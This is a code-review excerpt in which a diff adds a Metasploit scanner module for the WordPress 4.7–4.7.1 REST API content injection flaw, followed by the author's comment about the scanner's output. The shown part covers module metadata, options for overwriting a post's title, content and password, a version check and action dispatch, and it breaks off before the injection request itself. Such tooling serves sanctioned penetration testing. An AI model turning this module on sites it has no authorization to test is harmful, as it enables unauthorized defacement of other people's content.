modules/auxiliary/scanner/http/wordpress_content_injection.rb

```diff
@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress REST API Content Injection',
+      'Description'    => %q{
+        This module exploits a content injection vulnerability in WordPress
+        versions 4.7 and 4.7.1 via type juggling in the REST API.
+      },
+      'Author'         => [
+        'Marc Montpas', # Vulnerability discovery
+        'wvu'           # Metasploit module
+      ],
+      'References'     => [
+        ['URL', 'https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html'],
+        ['URL', 'https://secure.php.net/manual/en/language.types.type-juggling.php'],
+        ['URL', 'https://developer.wordpress.org/rest-api/using-the-rest-api/discovery/'],
+        ['URL', 'https://developer.wordpress.org/rest-api/reference/posts/']
+      ],
+      'DisclosureDate' => 'Feb 1 2017',
+      'License'        => MSF_LICENSE,
+      'Actions'        => [
+        ['LIST',   'Description' => 'List posts'],
+        ['UPDATE', 'Description' => 'Update post']
+      ],
+      'DefaultAction'  => 'LIST'
+    ))
+
+    register_options([
+      OptInt.new('POST_ID',          [false, 'Post ID (0 for all)', 0]),
+      OptString.new('POST_TITLE',    [false, 'Post title']),
+      OptString.new('POST_CONTENT',  [false, 'Post content']),
+      OptString.new('POST_PASSWORD', [false, 'Post password (\'\' for none)'])
+    ])
+  end
+
+  def check_host(_ip)
+    if (version = wordpress_version)
+      version = Gem::Version.new(version)
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    vprint_status("WordPress #{version}: #{full_uri}")
+
+    if version.between?(Gem::Version.new('4.7'), Gem::Version.new('4.7.1'))
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Detected
+    end
+  end
+
+  def run_host(_ip)
+    case action.name
+    when 'LIST'
+      do_list
+    when 'UPDATE'
+      do_update
+    end
+  end
+
+  def do_list
+    posts_to_list = list_posts
+
+    return if posts_to_list.empty?
```

Comment:
I had a message like that in the first commit before I turned this into a mass scanner. It kinda clutters up the output now, and you'd need to show the IP for it to be useful. If there are posts, a table is shown. If there are no posts, it moves to the next host silently.

Thoughts?